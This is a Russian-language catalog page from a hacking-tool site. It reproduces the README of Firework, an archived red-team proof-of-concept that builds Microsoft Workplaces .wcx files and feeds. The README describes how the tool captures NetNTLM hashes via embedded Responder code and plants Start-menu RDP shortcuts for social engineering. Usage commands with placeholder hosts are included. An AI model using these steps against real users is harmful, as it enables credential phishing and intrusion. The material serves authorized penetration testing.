Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Firework — Firework — это инструмент проверки концепции для взаимодействия с Microsoft Workplaces, создающий корректные файлы, необходимые для процесса подготовки (provisioning). | Kitploit
Инструменты/GitHubGitHub/spiderlabs/firework
OSINT для социальной инженерииГенерация полезной нагрузкиФишингТестирование на ПроникновениеКомандование и УправлениеСоциальная инженерияАутентификацияRed TeamingArchived
GitHubspiderlabs/firework

Firework

Firework — это инструмент проверки концепции для взаимодействия с Microsoft Workplaces, создающий корректные файлы, необходимые для процесса подготовки (provisioning).

431056 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
РепозиторийСайт

⚠️ ВНИМАНИЕ: Этот инструмент больше не поддерживается.

Firework

alt text

Firework — это инструмент для проверки концепции, предназначенный для взаимодействия с Microsoft Workplaces путём создания корректных файлов, необходимых для процесса подготовки. Инструмент также использует некоторый код из Responder, чтобы перехватывать хеши NetNTLM с системы, подготавливающей Workplace-ленту.

Этот инструмент может быть использован в рамках пентеста или команды red team для создания файла .wcx (и связанной ленты), который при щелчке может использоваться для:

  • Фишинга учётных данных — хеши NetNTLM будут отправлены, если пользователь вводит свои учётные данные (или на старых версиях Windows автоматически).
  • Добавления элементов в меню «Пуск» — после настройки в меню «Пуск» появляются ярлыки, запускающие обслуживаемые RDP-файлы. Эти записи потенциально могут быть использованы в рамках более широкой кампании социальной инженерии.
  • Загрузки ресурсов — такие ресурсы, как .rdp-файлы и файлы значков, ежедневно загружаются и обновляются Windows (если аутентификация ленты отключена или выполнена).

Подробное описание и пошаговое руководство читайте в блоге SpiderLabs.

Установка

  • Протестировано с Python 2.7.x. (Python3 пока не поддерживается, хотя основной класс Firework может использоваться в Python 3)
root@kitploit:~
$ pip install -r requirements.txt
  • Инструмент раздаёт контент по HTTPS и требует наличия сертификата и закрытого ключа для использования встроенного веб-сервера с перехватом NetNTLM. Файлы по умолчанию: cert.crt и key.pem

Использование

root@kitploit:~

.-:::::'::::::::::..  .,::::::.::    .   .:::  ...    :::::::..    :::  .   
;;;'''' ;;;;;;;``;;;; ;;;;''''';;,  ;;  ;;;'.;;;;;;;. ;;;;``;;;;   ;;; .;;,.
[[[,,== [[[ [[[,/[[['  [[cccc  '[[, [[, [[',[[     \[[,[[[,/[[['   [[[[[/'  
`$$$"`` $$$ $$$$$$c    $$""""    Y$c$$$c$P $$$,     $$$$$$$$$c    _$$$$,    
 888    888 888b "88bo,888oo,__   "88"888  "888,_ _,88P888b "88bo,"888"88o, 
 "MM,   MMM MMMM   "W" """"YUMMM   "M "M"    "YMMMMMP" MMMM   "W"  MMM "MMP"


usage: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN]
                   [-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH]
                   [-t CERT] [-k KEY]

Инструмент для работы с WCX

опциональные аргументы:
  -h, --help            показать это справочное сообщение и выйти
  -c COMPANY, --company COMPANY
                        Название компании
  -u URL, --url URL     URL ленты
  -a APP, --app APP     Имя приложения
  -e EXT, --ext EXT     Расширение приложения
  -i ICON, --icon ICON  Иконка приложения
  -l LISTEN, --listen LISTEN
                        Порт TLS веб-сервера
  -r RDP, --rdp RDP     RDP-сервер
  -d DOMAIN, --domain DOMAIN
                        RDP-домен
  -n USERNAME, --username USERNAME
                        RDP-имя пользователя
  -p PASSWORD, --password PASSWORD
                        RDP-пароль
  -t CERT, --cert CERT  SSL-сертификат
  -k KEY, --key KEY     SSL-ключ

Примеры

Базовый пример:

  • Название организации: EvilCorp
  • URL для XML ленты (или URL встроенного сервера Firework): https://example.org/ — отсюда Windows загружает ленту.
  • Имя приложения: Firework
  • Расширение файла: .fwk
  • Файл иконки: firework.ico
root@kitploit:~
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico 

Встроенный веб-сервер запустится на порту 443, если в текущем каталоге присутствуют файлы cert.crt и key.pem. Это вызовет NTLM-запрос от Responder. Если этих файлов нет, инструмент запишет все файлы в локальный каталог для самостоятельного хостинга.

Если вы хотите запустить встроенный веб-сервер на другом порту, используйте флаг -l, как показано ниже:

root@kitploit:~
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -l 8443

Вы также можете добавить некоторые настройки в обслуживаемый .rdp-файл.

  • Сервер удалённых рабочих столов: dc.corp.local
  • Домен: corp.local
  • Имя пользователя: admin
  • Зашифрованный пароль: зашифрованный пароль, который будет включён в RDP-файл

Примечание: пароли, сохранённые в .rdp-файлах, скорее всего, игнорируются в конфигурации по умолчанию.

root@kitploit:~
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <зашифрованный пароль>

Полезная нагрузка

После запуска инструмента в текущий каталог будет записан файл 'payload.wcx'. Этот файл при щелчке запускает процесс подготовки.

Авторы

  • David Middlehurst — Twitter: @dtmsecurity

Лицензия

Firework

Создано David Middlehurst Copyright (C) 2018 Trustwave Holdings, Inc.

Эта программа является свободным программным обеспечением: вы можете распространять и/или изменять её в соответствии с условиями Стандартной общественной лицензии GNU (GNU General Public License) в версии 3, либо (по вашему выбору) любой более поздней версии.

Эта программа распространяется в надежде, что она будет полезной, но БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ; даже без подразумеваемых гарантий КОММЕРЧЕСКОЙ ЦЕННОСТИ или ПРИГОДНОСТИ ДЛЯ КОНКРЕТНОЙ ЦЕЛИ. Подробнее см. в Стандартной общественной лицензии GNU.

Благодарности

  • Responder от Laurent Gaffie
  • Иконка Firework
Скачать инструмент